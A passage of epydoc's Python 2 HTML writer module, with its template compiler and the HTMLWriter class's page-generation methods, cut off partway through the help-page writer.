# # epydoc -- HTML output generator # Edward Loper # # Created [01/30/01 05:18 PM] # $Id: html.py 1674 2008-01-29 06:03:36Z edloper $ # """ The HTML output generator for epydoc. The main interface provided by this module is the L{HTMLWriter} class. @todo: Add a cache to L{HTMLWriter.url()}? """ __docformat__ = 'epytext en' import re, os, sys, codecs, sre_constants, pprint, base64 import urllib import __builtin__ from epydoc.apidoc import * import epydoc.docstringparser import time, epydoc, epydoc.markup, epydoc.markup.epytext from epydoc.docwriter.html_colorize import PythonSourceColorizer from epydoc.docwriter import html_colorize from epydoc.docwriter.html_css import STYLESHEETS from epydoc.docwriter.html_help import HTML_HELP from epydoc.docwriter.dotgraph import * from epydoc import log from epydoc.util import plaintext_to_html, is_src_filename from epydoc.compat import * # Backwards compatibility ###################################################################### ## Template Compiler ###################################################################### # The compile_template() method defined in this section is used to # define several of HTMLWriter's methods. def compile_template(docstring, template_string, output_function='out', debug=epydoc.DEBUG): """ Given a template string containing inline python source code, return a python function that will fill in the template, and output the result. The signature for this function is taken from the first line of C{docstring}. Output is generated by making repeated calls to the output function with the given name (which is typically one of the function's parameters). The templating language used by this function passes through all text as-is, with three exceptions: - If every line in the template string is indented by at least M{x} spaces, then the first M{x} spaces are stripped from each line. - Any line that begins with '>>>' (with no indentation) should contain python code, and will be inserted as-is into the template-filling function. If the line begins a control block (such as 'if' or 'for'), then the control block will be closed by the first '>>>'-marked line whose indentation is less than or equal to the line's own indentation (including lines that only contain comments.) - In any other line, any expression between two '$' signs will be evaluated and inserted into the line (using C{str()} to convert the result to a string). Here is a simple example: >>> TEMPLATE = ''' ... <book> ... <title>$book.title$</title> ... <pages>$book.count_pages()$</pages> ... >>> for chapter in book.chapters: ... <chaptername>$chapter.name$</chaptername> ... >>> #endfor ... </book> >>> write_book = compile_template('write_book(out, book)', TEMPLATE) @newfield acknowledgements: Acknowledgements @acknowledgements: The syntax used by C{compile_template} is loosely based on Cheetah. """ # Extract signature from the docstring: signature = docstring.lstrip().split('\n',1)[0].strip() func_name = signature.split('(',1)[0].strip() # Regexp to search for inline substitutions: INLINE = re.compile(r'\$([^\$]+)\$') # Regexp to search for python statements in the template: COMMAND = re.compile(r'(^>>>.*)\n?', re.MULTILINE) # Strip indentation from the template. template_string = strip_indent(template_string) # If we're debugging, then we'll store the generated function, # so we can print it along with any tracebacks that depend on it. if debug: signature = re.sub(r'\)\s*$', ', __debug=__debug)', signature) # Funciton declaration line pysrc_lines = ['def %s:' % signature] indents = [-1] if debug: pysrc_lines.append(' try:') indents.append(-1) commands = COMMAND.split(template_string.strip()+'\n') for i, command in enumerate(commands): if command == '': continue # String literal segment: if i%2 == 0: pieces = INLINE.split(command) for j, piece in enumerate(pieces): if j%2 == 0: # String piece pysrc_lines.append(' '*len(indents)+ '%s(%r)' % (output_function, piece)) else: # Variable piece pysrc_lines.append(' '*len(indents)+ '%s(unicode(%s))' % (output_function, piece)) # Python command: else: srcline = command[3:].lstrip() # Update indentation indent = len(command)-len(srcline) while indent <= indents[-1]: indents.pop() # Add on the line. srcline = srcline.rstrip() pysrc_lines.append(' '*len(indents)+srcline) if srcline.endswith(':'): indents.append(indent) if debug: pysrc_lines.append(' except Exception,e:') pysrc_lines.append(' pysrc, func_name = __debug ') pysrc_lines.append(' lineno = sys.exc_info()[2].tb_lineno') pysrc_lines.append(' print ("Exception in template %s() on "') pysrc_lines.append(' "line %d:" % (func_name, lineno))') pysrc_lines.append(' print pysrc[lineno-1]') pysrc_lines.append(' raise') pysrc = '\n'.join(pysrc_lines)+'\n' #log.debug(pysrc) if debug: localdict = {'__debug': (pysrc_lines, func_name)} else: localdict = {} try: exec pysrc in globals(), localdict except SyntaxError: log.error('Error in script:\n' + pysrc + '\n') raise template_func = localdict[func_name] template_func.__doc__ = docstring return template_func def strip_indent(s): """ Given a multiline string C{s}, find the minimum indentation for all non-blank lines, and return a new string formed by stripping that amount of indentation from all lines in C{s}. """ # Strip indentation from the template. minindent = sys.maxint lines = s.split('\n') for line in lines: stripline = line.lstrip() if stripline: minindent = min(minindent, len(line)-len(stripline)) return '\n'.join([l[minindent:] for l in lines]) ###################################################################### ## HTML Writer ###################################################################### class HTMLWriter: #//////////////////////////////////////////////////////////// # Table of Contents #//////////////////////////////////////////////////////////// # # 1. Interface Methods # # 2. Page Generation -- write complete web page files # 2.1. Module Pages # 2.2. Class Pages # 2.3. Trees Page # 2.4. Indices Page # 2.5. Help Page # 2.6. Frames-based table of contents pages # 2.7. Homepage (index.html) # 2.8. CSS Stylesheet # 2.9. Javascript file # 2.10. Graphs # 2.11. Images # # 3. Page Element Generation -- write pieces of a web page file # 3.1. Page Header # 3.2. Page Footer # 3.3. Navigation Bar # 3.4. Breadcrumbs # 3.5. Summary Tables # # 4. Helper functions def __init__(self, docindex, **kwargs): """ Construct a new HTML writer, using the given documentation index. @param docindex: The documentation index. @type prj_name: C{string} @keyword prj_name: The name of the project. Defaults to none. @type prj_url: C{string} @keyword prj_url: The target for the project hopeage link on the navigation bar. If C{prj_url} is not specified, then no hyperlink is created. @type prj_link: C{string} @keyword prj_link: The label for the project link on the navigation bar. This link can contain arbitrary HTML code (e.g. images). By default, a label is constructed from C{prj_name}. @type top_page: C{string} @keyword top_page: The top page for the documentation. This is the default page shown main frame, when frames are enabled. C{top} can be a URL, the name of a module, the name of a class, or one of the special strings C{"trees.html"}, C{"indices.html"}, or C{"help.html"}. By default, the top-level package or module is used, if there is one; otherwise, C{"trees"} is used. @type css: C{string} @keyword css: The CSS stylesheet file. If C{css} is a file name, then the specified file's conents will be used. Otherwise, if C{css} is the name of a CSS stylesheet in L{epydoc.docwriter.html_css}, then that stylesheet will be used. Otherwise, an error is reported. If no stylesheet is specified, then the default stylesheet is used. @type help_file: C{string} @keyword help_file: The name of the help file. If no help file is specified, then the default help file will be used. @type show_private: C{boolean} @keyword show_private: Whether to create documentation for private objects. By default, private objects are documented. @type show_frames: C{boolean}) @keyword show_frames: Whether to create a frames-based table of contents. By default, it is produced. @type show_imports: C{boolean} @keyword show_imports: Whether or not to display lists of imported functions and classes. By default, they are not shown. @type variable_maxlines: C{int} @keyword variable_maxlines: The maximum number of lines that should be displayed for the value of a variable in the variable details section. By default, 8 lines are displayed. @type variable_linelength: C{int} @keyword variable_linelength: The maximum line length used for displaying the values of variables in the variable details sections. If a line is longer than this length, then it will be wrapped to the next line. The default line length is 70 characters. @type variable_summary_linelength: C{int} @keyword variable_summary_linelength: The maximum line length used for displaying the values of variables in the summary section. If a line is longer than this length, then it will be truncated. The default is 40 characters. @type variable_tooltip_linelength: C{int} @keyword variable_tooltip_linelength: The maximum line length used for tooltips for the values of variables. If a line is longer than this length, then it will be truncated. The default is 600 characters. @type property_function_linelength: C{int} @keyword property_function_linelength: The maximum line length used to dispaly property functions (C{fget}, C{fset}, and C{fdel}) that contain something other than a function object. The default length is 40 characters. @type inheritance: C{string} @keyword inheritance: How inherited objects should be displayed. If C{inheritance='grouped'}, then inherited objects are gathered into groups; if C{inheritance='listed'}, then inherited objects are listed in a short list at the end of their group; if C{inheritance='included'}, then inherited objects are mixed in with non-inherited objects. The default is 'grouped'. @type include_source_code: C{boolean} @keyword include_source_code: If true, then generate colorized source code files for each python module. @type include_log: C{boolean} @keyword include_log: If true, the the footer will include an href to the page 'epydoc-log.html'. @type src_code_tab_width: C{int} @keyword src_code_tab_width: Number of spaces to replace each tab with in source code listings. """ self.docindex = docindex # Process keyword arguments. self._show_private = kwargs.get('show_private', 1) """Should private docs be included?""" self._prj_name = kwargs.get('prj_name', None) """The project's name (for the project link in the navbar)""" self._prj_url = kwargs.get('prj_url', None) """URL for the project link in the navbar""" self._prj_link = kwargs.get('prj_link', None) """HTML code for the project link in the navbar""" self._top_page = kwargs.get('top_page', None) """The 'main' page""" self._css = kwargs.get('css') """CSS stylesheet to use""" self._helpfile = kwargs.get('help_file', None) """Filename of file to extract help contents from""" self._frames_index = kwargs.get('show_frames', 1) """Should a frames index be created?""" self._show_imports = kwargs.get('show_imports', False) """Should imports be listed?""" self._propfunc_linelen = kwargs.get('property_function_linelength', 40) """[XXX] Not used!""" self._variable_maxlines = kwargs.get('variable_maxlines', 8) """Max lines for variable values""" self._variable_linelen = kwargs.get('variable_linelength', 70) """Max line length for variable values""" self._variable_summary_linelen = \ kwargs.get('variable_summary_linelength', 65) """Max length for variable value summaries""" self._variable_tooltip_linelen = \ kwargs.get('variable_tooltip_linelength', 600) """Max length for variable tooltips""" self._inheritance = kwargs.get('inheritance', 'listed') """How should inheritance be displayed? 'listed', 'included', or 'grouped'""" self._incl_sourcecode = kwargs.get('include_source_code', True) """Should pages be generated for source code of modules?""" self._mark_docstrings = kwargs.get('mark_docstrings', False) """Wrap <span class='docstring'>...</span> around docstrings?""" self._graph_types = kwargs.get('graphs', ()) or () """Graphs that we should include in our output.""" self._include_log = kwargs.get('include_log', False) """Are we generating an HTML log page?""" self._src_code_tab_width = kwargs.get('src_code_tab_width', 8) """Number of spaces to replace each tab with in source code listings.""" self._callgraph_cache = {} """Map the callgraph L{uid<DotGraph.uid>} to their HTML representation.""" self._redundant_details = kwargs.get('redundant_details', False) """If true, then include objects in the details list even if all info about them is already provided by the summary table.""" # For use with select_variables(): if self._show_private: self._public_filter = None else: self._public_filter = True # Make sure inheritance has a sane value. if self._inheritance not in ('listed', 'included', 'grouped'): raise ValueError, 'Bad value for inheritance' # Create the project homepage link, if it was not specified. if (self._prj_name or self._prj_url) and not self._prj_link: self._prj_link = plaintext_to_html(self._prj_name or 'Project Homepage') # Add a hyperlink to _prj_url, if _prj_link doesn't already # contain any hyperlinks. if (self._prj_link and self._prj_url and not re.search(r'<a[^>]*\shref', self._prj_link)): self._prj_link = ('<a class="navbar" target="_top" href="'+ self._prj_url+'">'+self._prj_link+'</a>') # Precompute lists & sets of APIDoc objects that we're # interested in. self.valdocs = valdocs = sorted(docindex.reachable_valdocs( imports=False, packages=False, bases=False, submodules=False, subclasses=False, private=self._show_private)) self.module_list = [d for d in valdocs if isinstance(d, ModuleDoc)] """The list of L{ModuleDoc}s for the documented modules.""" self.module_set = set(self.module_list) """The set of L{ModuleDoc}s for the documented modules.""" self.class_list = [d for d in valdocs if isinstance(d, ClassDoc)] """The list of L{ClassDoc}s for the documented classes.""" self.class_set = set(self.class_list) """The set of L{ClassDoc}s for the documented classes.""" self.routine_list = [d for d in valdocs if isinstance(d, RoutineDoc)] """The list of L{RoutineDoc}s for the documented routines.""" self.indexed_docs = [] """The list of L{APIDoc}s for variables and values that should be included in the index.""" # URL for 'trees' page if self.module_list: self._trees_url = 'module-tree.html' else: self._trees_url = 'class-tree.html' # Construct the value for self.indexed_docs. self.indexed_docs += [d for d in valdocs if not isinstance(d, GenericValueDoc)] for doc in valdocs: if isinstance(doc, NamespaceDoc): # add any vars with generic values; but don't include # inherited vars. self.indexed_docs += [d for d in doc.variables.values() if isinstance(d.value, GenericValueDoc) and d.container == doc] self.indexed_docs.sort() # Figure out the url for the top page. self._top_page_url = self._find_top_page(self._top_page) # Decide whether or not to split the identifier index. self._split_ident_index = (len(self.indexed_docs) >= self.SPLIT_IDENT_INDEX_SIZE) # Figure out how many output files there will be (for progress # reporting). self.modules_with_sourcecode = set() for doc in self.module_list: if isinstance(doc, ModuleDoc) and is_src_filename(doc.filename): self.modules_with_sourcecode.add(doc) self._num_files = (len(self.class_list) + len(self.module_list) + 10 + len(self.METADATA_INDICES)) if self._frames_index: self._num_files += len(self.module_list) + 3 if self._incl_sourcecode: self._num_files += len(self.modules_with_sourcecode) if self._split_ident_index: self._num_files += len(self.LETTERS) def _find_top_page(self, pagename): """ Find the top page for the API documentation. This page is used as the default page shown in the main frame, when frames are used. When frames are not used, this page is copied to C{index.html}. @param pagename: The name of the page, as specified by the keyword argument C{top} to the constructor. @type pagename: C{string} @return: The URL of the top page. @rtype: C{string} """ # If a page name was specified, then we need to figure out # what it points to. if pagename: # If it's a URL, then use it directly. if pagename.lower().startswith('http:'): return pagename # If it's an object, then use that object's page. try: doc = self.docindex.get_valdoc(pagename) return self.url(doc) except: pass # Otherwise, give up. log.warning('Could not find top page %r; using %s ' 'instead' % (pagename, self._trees_url)) return self._trees_url # If no page name was specified, then try to choose one # automatically. else: root = [val_doc for val_doc in self.docindex.root if isinstance(val_doc, (ClassDoc, ModuleDoc))] if len(root) == 0: # No docs?? Try the trees page. return self._trees_url elif len(root) == 1: # One item in the root; use that. return self.url(root[0]) else: # Multiple root items; if they're all in one package, # then use that. Otherwise, use self._trees_url root = sorted(root, key=lambda v:len(v.canonical_name)) top = root[0] for doc in root[1:]: if not top.canonical_name.dominates(doc.canonical_name): return self._trees_url else: return self.url(top) #//////////////////////////////////////////////////////////// #{ 1. Interface Methods #//////////////////////////////////////////////////////////// def write(self, directory=None): """ Write the documentation to the given directory. @type directory: C{string} @param directory: The directory to which output should be written. If no directory is specified, output will be written to the current directory. If the directory does not exist, it will be created. @rtype: C{None} @raise OSError: If C{directory} cannot be created. @raise OSError: If any file cannot be created or written to. """ # For progress reporting: self._files_written = 0. # Set the default values for ValueDoc formatted representations. orig_valdoc_defaults = (ValueDoc.SUMMARY_REPR_LINELEN, ValueDoc.REPR_LINELEN, ValueDoc.REPR_MAXLINES) ValueDoc.SUMMARY_REPR_LINELEN = self._variable_summary_linelen ValueDoc.REPR_LINELEN = self._variable_linelen ValueDoc.REPR_MAXLINES = self._variable_maxlines # Use an image for the crarr symbol. from epydoc.markup.epytext import ParsedEpytextDocstring orig_crarr_html = ParsedEpytextDocstring.SYMBOL_TO_HTML['crarr'] ParsedEpytextDocstring.SYMBOL_TO_HTML['crarr'] = ( r'<span class="variable-linewrap">' r'<img src="crarr.png" alt="\" /></span>') # Keep track of failed xrefs, and report them at the end. self._failed_xrefs = {} # Create destination directories, if necessary if not directory: directory = os.curdir self._mkdir(directory) self._directory = directory # Write the CSS file. self._files_written += 1 log.progress(self._files_written/self._num_files, 'epydoc.css') self.write_css(directory, self._css) # Write the Javascript file. self._files_written += 1 log.progress(self._files_written/self._num_files, 'epydoc.js') self.write_javascript(directory) # Write images self.write_images(directory) # Build the indices. indices = {'ident': self.build_identifier_index(), 'term': self.build_term_index()} for (name, label, label2) in self.METADATA_INDICES: indices[name] = self.build_metadata_index(name) # Write the identifier index. If requested, split it into # separate pages for each letter. ident_by_letter = self._group_by_letter(indices['ident']) if not self._split_ident_index: self._write(self.write_link_index, directory, 'identifier-index.html', indices, 'Identifier Index', 'identifier-index.html', ident_by_letter) else: # Write a page for each section. for letter in self.LETTERS: filename = 'identifier-index-%s.html' % letter self._write(self.write_link_index, directory, filename, indices, 'Identifier Index', filename, ident_by_letter, [letter], 'identifier-index-%s.html') # Use the first non-empty section as the main index page. for letter in self.LETTERS: if letter in ident_by_letter: filename = 'identifier-index.html' self._write(self.write_link_index, directory, filename, indices, 'Identifier Index', filename, ident_by_letter, [letter], 'identifier-index-%s.html') break # Write the term index. if indices['term']: term_by_letter = self._group_by_letter(indices['term']) self._write(self.write_link_index, directory, 'term-index.html', indices, 'Term Definition Index', 'term-index.html', term_by_letter) else: self._files_written += 1 # (skipped) # Write the metadata indices. for (name, label, label2) in self.METADATA_INDICES: if indices[name]: self._write(self.write_metadata_index, directory, '%s-index.html' % name, indices, name, label, label2) else: self._files_written += 1 # (skipped) # Write the trees file (package & class hierarchies) if self.module_list: self._write(self.write_module_tree, directory, 'module-tree.html') else: self._files_written += 1 # (skipped) if self.class_list: self._write(self.write_class_tree, directory, 'class-tree.html') else: self._files_written += 1 # (skipped) # Write the help file. self._write(self.write_help, directory,'help.html') # Write the frames-based table of contents. if self._frames_index: self._write(self.write_frames_index, directory, 'frames.html') self._write(self.write_toc, directory, 'toc.html') self._write(self.write_project_toc, directory, 'toc-everything.html') for doc in self.module_list: filename = 'toc-%s' % urllib.unquote(self.url(doc)) self._write(self.write_module_toc, directory, filename, doc) # Write the object documentation. for doc in self.module_list: filename = urllib.unquote(self.url(doc)) self._write(self.write_module, directory, filename, doc) for doc in self.class_list: filename = urllib.unquote(self.url(doc)) self._write(self.write_class, directory, filename, doc) # Write source code files. if self._incl_sourcecode: # Build a map from short names to APIDocs, used when # linking names in the source code. name_to_docs = {} for api_doc in self.indexed_docs: if (api_doc.canonical_name is not None and self.url(api_doc) is not None): name = api_doc.canonical_name[-1] name_to_docs.setdefault(name, []).append(api_doc) # Sort each entry of the name_to_docs list. for doc_list in name_to_docs.values(): doc_list.sort() # Write the source code for each module. for doc in self.modules_with_sourcecode: filename = urllib.unquote(self.pysrc_url(doc)) self._write(self.write_sourcecode, directory, filename, doc, name_to_docs) # Write the auto-redirect page. self._write(self.write_redirect_page, directory, 'redirect.html') # Write the mapping object name -> URL self._write(self.write_api_list, directory, 'api-objects.txt') # Write the index.html files. # (this must be done last, since it might copy another file) self._files_written += 1 log.progress(self._files_written/self._num_files, 'index.html') self.write_homepage(directory) # Don't report references to builtins as missing for k in self._failed_xrefs.keys(): # have a copy of keys if hasattr(__builtin__, k): del self._failed_xrefs[k] # Report any failed crossreferences if self._failed_xrefs: estr = 'Failed identifier crossreference targets:\n' failed_identifiers = self._failed_xrefs.keys() failed_identifiers.sort() for identifier in failed_identifiers: names = self._failed_xrefs[identifier].keys() names.sort() estr += '- %s' % identifier estr += '\n' for name in names: estr += ' (from %s)\n' % name log.docstring_warning(estr) # [xx] testing: if self._num_files != int(self._files_written): log.debug("Expected to write %d files, but actually " "wrote %d files" % (self._num_files, int(self._files_written))) # Restore defaults that we changed. (ValueDoc.SUMMARY_REPR_LINELEN, ValueDoc.REPR_LINELEN, ValueDoc.REPR_MAXLINES) = orig_valdoc_defaults ParsedEpytextDocstring.SYMBOL_TO_HTML['crarr'] = orig_crarr_html def _write(self, write_func, directory, filename, *args): # Display our progress. self._files_written += 1 log.progress(self._files_written/self._num_files, filename) path = os.path.join(directory, filename) f = codecs.open(path, 'w', 'ascii', errors='xmlcharrefreplace') write_func(f.write, *args) f.close() def _mkdir(self, directory): """ If the given directory does not exist, then attempt to create it. @rtype: C{None} """ if not os.path.isdir(directory): if os.path.exists(directory): raise OSError('%r is not a directory' % directory) os.mkdir(directory) #//////////////////////////////////////////////////////////// #{ 2.1. Module Pages #//////////////////////////////////////////////////////////// def write_module(self, out, doc): """ Write an HTML page containing the API documentation for the given module to C{out}. @param doc: A L{ModuleDoc} containing the API documentation for the module that should be described. """ longname = doc.canonical_name shortname = doc.canonical_name[-1] # Write the page header (incl. navigation bar & breadcrumbs) self.write_header(out, str(longname)) self.write_navbar(out, doc) self.write_breadcrumbs(out, doc, self.url(doc)) # Write the name of the module we're describing. if doc.is_package is True: typ = 'Package' else: typ = 'Module' if longname[0].startswith('script-'): shortname = str(longname)[7:] typ = 'Script' out('<!-- ==================== %s ' % typ.upper() + 'DESCRIPTION ==================== -->\n') out('<h1 class="epydoc">%s %s</h1>' % (typ, shortname)) out('<p class="nomargin-top">%s</p>\n' % self.pysrc_link(doc)) # If the module has a description, then list it. if doc.descr not in (None, UNKNOWN): out(self.descr(doc, 2)+'\n\n') # Write any standarad metadata (todo, author, etc.) if doc.metadata is not UNKNOWN and doc.metadata: out('<hr />\n') self.write_standard_fields(out, doc) # If it's a package, then list the modules it contains. if doc.is_package is True: self.write_module_list(out, doc) # Write summary tables describing the variables that the # module defines. self.write_summary_table(out, "Classes", doc, "class") self.write_summary_table(out, "Functions", doc, "function") self.write_summary_table(out, "Variables", doc, "other") # Write a list of all imported objects. if self._show_imports: self.write_imports(out, doc) # Write detailed descriptions of functions & variables defined # in this module. self.write_details_list(out, "Function Details", doc, "function") self.write_details_list(out, "Variables Details", doc, "other") # Write the page footer (including navigation bar) self.write_navbar(out, doc) self.write_footer(out) #//////////////////////////////////////////////////////////// #{ 2.??. Source Code Pages #//////////////////////////////////////////////////////////// def write_sourcecode(self, out, doc, name_to_docs): #t0 = time.time() filename = doc.filename name = str(doc.canonical_name) # Header self.write_header(out, name) self.write_navbar(out, doc) self.write_breadcrumbs(out, doc, self.pysrc_url(doc)) # Source code listing out('<h1 class="epydoc">Source Code for %s</h1>\n' % self.href(doc, label='%s %s' % (self.doc_kind(doc), name))) out('<pre class="py-src">\n') out(PythonSourceColorizer(filename, name, self.docindex, self.url, name_to_docs, self._src_code_tab_width).colorize()) out('</pre>\n<br />\n') # Footer self.write_navbar(out, doc) self.write_footer(out) #log.debug('[%6.2f sec] Wrote pysrc for %s' % # (time.time()-t0, name)) #//////////////////////////////////////////////////////////// #{ 2.2. Class Pages #//////////////////////////////////////////////////////////// def write_class(self, out, doc): """ Write an HTML page containing the API documentation for the given class to C{out}. @param doc: A L{ClassDoc} containing the API documentation for the class that should be described. """ longname = doc.canonical_name shortname = doc.canonical_name[-1] # Write the page header (incl. navigation bar & breadcrumbs) self.write_header(out, str(longname)) self.write_navbar(out, doc) self.write_breadcrumbs(out, doc, self.url(doc)) # Write the name of the class we're describing. if doc.is_type(): typ = 'Type' elif doc.is_exception(): typ = 'Exception' else: typ = 'Class' out('<!-- ==================== %s ' % typ.upper() + 'DESCRIPTION ==================== -->\n') out('<h1 class="epydoc">%s %s</h1>' % (typ, shortname)) out('<p class="nomargin-top">%s</p>\n' % self.pysrc_link(doc)) if ((doc.bases not in (UNKNOWN, None) and len(doc.bases) > 0) or (doc.subclasses not in (UNKNOWN,None) and len(doc.subclasses)>0)): # Display bases graphically, if requested. if 'umlclasstree' in self._graph_types: self.write_class_tree_graph(out, doc, uml_class_tree_graph) elif 'classtree' in self._graph_types: self.write_class_tree_graph(out, doc, class_tree_graph) # Otherwise, use ascii-art. else: # Write the base class tree. if doc.bases not in (UNKNOWN, None) and len(doc.bases) > 0: out('<pre class="base-tree">\n%s</pre>\n\n' % self.base_tree(doc)) # Write the known subclasses if (doc.subclasses not in (UNKNOWN, None) and len(doc.subclasses) > 0): out('<dl><dt>Known Subclasses:</dt>\n<dd>\n ') out(' <ul class="subclass-list">\n') for i, subclass in enumerate(doc.subclasses): href = self.href(subclass, context=doc) if self._val_is_public(subclass): css = '' else: css = ' class="private"' if i > 0: href = ', '+href out('<li%s>%s</li>' % (css, href)) out(' </ul>\n') out('</dd></dl>\n\n') out('<hr />\n') # If the class has a description, then list it. if doc.descr not in (None, UNKNOWN): out(self.descr(doc, 2)+'\n\n') # Write any standarad metadata (todo, author, etc.) if doc.metadata is not UNKNOWN and doc.metadata: out('<hr />\n') self.write_standard_fields(out, doc) # Write summary tables describing the variables that the # class defines. self.write_summary_table(out, "Nested Classes", doc, "class") self.write_summary_table(out, "Instance Methods", doc, "instancemethod") self.write_summary_table(out, "Class Methods", doc, "classmethod") self.write_summary_table(out, "Static Methods", doc, "staticmethod") self.write_summary_table(out, "Class Variables", doc, "classvariable") self.write_summary_table(out, "Instance Variables", doc, "instancevariable") self.write_summary_table(out, "Properties", doc, "property") # Write a list of all imported objects. if self._show_imports: self.write_imports(out, doc) # Write detailed descriptions of functions & variables defined # in this class. # [xx] why group methods into one section but split vars into two? # seems like we should either group in both cases or split in both # cases. self.write_details_list(out, "Method Details", doc, "method") self.write_details_list(out, "Class Variable Details", doc, "classvariable") self.write_details_list(out, "Instance Variable Details", doc, "instancevariable") self.write_details_list(out, "Property Details", doc, "property") # Write the page footer (including navigation bar) self.write_navbar(out, doc) self.write_footer(out) def write_class_tree_graph(self, out, doc, graphmaker): """ Write HTML code for a class tree graph of C{doc} (a classdoc), using C{graphmaker} to draw the actual graph. C{graphmaker} should be L{class_tree_graph()}, or L{uml_class_tree_graph()}, or any other function with a compatible signature. If the given class has any private sublcasses (including recursive subclasses), then two graph images will be generated -- one to display when private values are shown, and the other to display when private values are hidden. """ linker = _HTMLDocstringLinker(self, doc) private_subcls = self._private_subclasses(doc) if private_subcls: out('<center>\n' ' <div class="private">%s</div>\n' ' <div class="public" style="display:none">%s</div>\n' '</center>\n' % (self.render_graph(graphmaker(doc, linker, doc)), self.render_graph(graphmaker(doc, linker, doc, exclude=private_subcls)))) else: out('<center>\n%s\n</center>\n' % self.render_graph(graphmaker(doc, linker, doc))) #//////////////////////////////////////////////////////////// #{ 2.3. Trees pages #//////////////////////////////////////////////////////////// def write_module_tree(self, out): # Header material self.write_treepage_header(out, 'Module Hierarchy', 'module-tree.html') out('<h1 class="epydoc">Module Hierarchy</h1>\n') # Write entries for all top-level modules/packages. out('<ul class="nomargin-top">\n') for doc in self.module_list: if (doc.package in (None, UNKNOWN) or doc.package not in self.module_set): self.write_module_tree_item(out, doc) out('</ul>\n') # Footer material self.write_navbar(out, 'trees') self.write_footer(out) def write_class_tree(self, out): """ Write HTML code for a nested list showing the base/subclass relationships between all documented classes. Each element of the top-level list is a class with no (documented) bases; and under each class is listed all of its subclasses. Note that in the case of multiple inheritance, a class may appear multiple times. @todo: For multiple inheritance, don't repeat subclasses the second time a class is mentioned; instead, link to the first mention. """ # [XX] backref for multiple inheritance? # Header material self.write_treepage_header(out, 'Class Hierarchy', 'class-tree.html') out('<h1 class="epydoc">Class Hierarchy</h1>\n') # Build a set containing all classes that we should list. # This includes everything in class_list, plus any of those # class' bases, but not undocumented subclasses. class_set = self.class_set.copy() for doc in self.class_list: if doc.bases != UNKNOWN: for base in doc.bases: if base not in class_set: if isinstance(base, ClassDoc): class_set.update(base.mro()) else: # [XX] need to deal with this -- how? pass #class_set.add(base) out('<ul class="nomargin-top">\n') for doc in sorted(class_set, key=lambda c:c.canonical_name[-1]): if doc.bases != UNKNOWN and len(doc.bases)==0: self.write_class_tree_item(out, doc, class_set) out('</ul>\n') # Footer material self.write_navbar(out, 'trees') self.write_footer(out) def write_treepage_header(self, out, title, url): # Header material. self.write_header(out, title) self.write_navbar(out, 'trees') self.write_breadcrumbs(out, 'trees', url) if self.class_list and self.module_list: out('<center><b>\n') out(' [ <a href="module-tree.html">Module Hierarchy</a>\n') out(' | <a href="class-tree.html">Class Hierarchy</a> ]\n') out('</b></center><br />\n') #//////////////////////////////////////////////////////////// #{ 2.4. Index pages #//////////////////////////////////////////////////////////// SPLIT_IDENT_INDEX_SIZE = 3000 """If the identifier index has more than this number of entries, then it will be split into separate pages, one for each alphabetical section.""" LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ_' """The alphabetical sections that are used for link index pages.""" def write_link_index(self, out, indices, title, url, index_by_section, sections=LETTERS, section_url='#%s'): # Header self.write_indexpage_header(out, indices, title, url) # Index title & links to alphabetical sections. out('<table border="0" width="100%">\n' '<tr valign="bottom"><td>\n') out('<h1 class="epydoc">%s</h1>\n</td><td>\n[\n' % title) for sec in self.LETTERS: if sec in index_by_section: out(' <a href="%s">%s</a>\n' % (section_url % sec, sec)) else: out(' %s\n' % sec) out(']\n') out('</td></table>\n') # Alphabetical sections. sections = [s for s in sections if s in index_by_section] if sections: out('<table border="0" width="100%">\n') for section in sorted(sections): out('<tr valign="top"><td valign="top" width="1%">') out('<h2 class="epydoc"><a name="%s">%s</a></h2></td>\n' % (section, section)) out('<td valign="top">\n') self.write_index_section(out, index_by_section[section], True) out('</td></tr>\n') out('</table>\n<br />') # Footer material. out('<br />') self.write_navbar(out, 'indices') self.write_footer(out) def write_metadata_index(self, out, indices, field, title, typ): """ Write an HTML page containing a metadata index. """ index = indices[field] # Header material. self.write_indexpage_header(out, indices, title, '%s-index.html' % field) # Page title. out('<h1 class="epydoc"><a name="%s">%s</a></h1>\n<br />\n' % (field, title)) # Index (one section per arg) for arg in sorted(index): # Write a section title. if arg is not None: if len([1 for (doc, descrs) in index[arg] if not self._doc_or_ancestor_is_private(doc)]) == 0: out('<div class="private">') else: out('<div>') self.write_table_header(out, 'metadata-index', arg) out('</table>') # List every descr for this arg. for (doc, descrs) in index[arg]: if self._doc_or_ancestor_is_private(doc): out('<div class="private">\n') else: out('<div>\n') out('<table width="100%" class="metadata-index" ' 'bgcolor="#e0e0e0"><tr><td class="metadata-index">') out('<b>%s in %s</b>' % (typ, self.href(doc, label=doc.canonical_name))) out(' <ul class="nomargin">\n') for descr in descrs: out(' <li>%s</li>\n' % self.docstring_to_html(descr,doc,4)) out(' </ul>\n') out('</table></div>\n') # Footer material. out('<br />') self.write_navbar(out, 'indices') self.write_footer(out) def write_indexpage_header(self, out, indices, title, url): """ A helper for the index page generation functions, which generates a header that can be used to navigate between the different indices. """ self.write_header(out, title) self.write_navbar(out, 'indices') self.write_breadcrumbs(out, 'indices', url) if (indices['term'] or [1 for (name,l,l2) in self.METADATA_INDICES if indices[name]]): out('<center><b>[\n') out(' <a href="identifier-index.html">Identifiers</a>\n') if indices['term']: out('| <a href="term-index.html">Term Definitions</a>\n') for (name, label, label2) in self.METADATA_INDICES: if indices[name]: out('| <a href="%s-index.html">%s</a>\n' % (name, label2)) out(']</b></center><br />\n') def write_index_section(self, out, items, add_blankline=False): out('<table class="link-index" width="100%" border="1">\n') num_rows = (len(items)+2)/3 for row in range(num_rows): out('<tr>\n') for col in range(3): out('<td width="33%" class="link-index">') i = col*num_rows+row if i < len(items): name, url, container = items[col*num_rows+row] out('<a href="%s">%s</a>' % (url, name)) if container is not None: out('<br />\n') if isinstance(container, ModuleDoc): label = container.canonical_name else: label = container.canonical_name[-1] out('<span class="index-where">(in&nbsp;%s)' '</span>' % self.href(container, label)) else: out('&nbsp;') out('</td>\n') out('</tr>\n') if add_blankline and num_rows == 1: blank_cell = '<td class="link-index">&nbsp;</td>' out('<tr>'+3*blank_cell+'</tr>\n') out('</table>\n') #//////////////////////////////////////////////////////////// #{ 2.5. Help Page #//////////////////////////////////////////////////////////// def write_help(self, out): """ Write an HTML help file to the given stream. If C{self._helpfile} contains a help file, then use it; otherwise, use the default helpfile from L{epydoc.docwriter.html_help}. """ # todo: optionally parse .rst etc help files? # Get the contents of the help file. if self._helpfile: if os.path.exists(self._helpfile): try: help = open(self._helpfile).read() 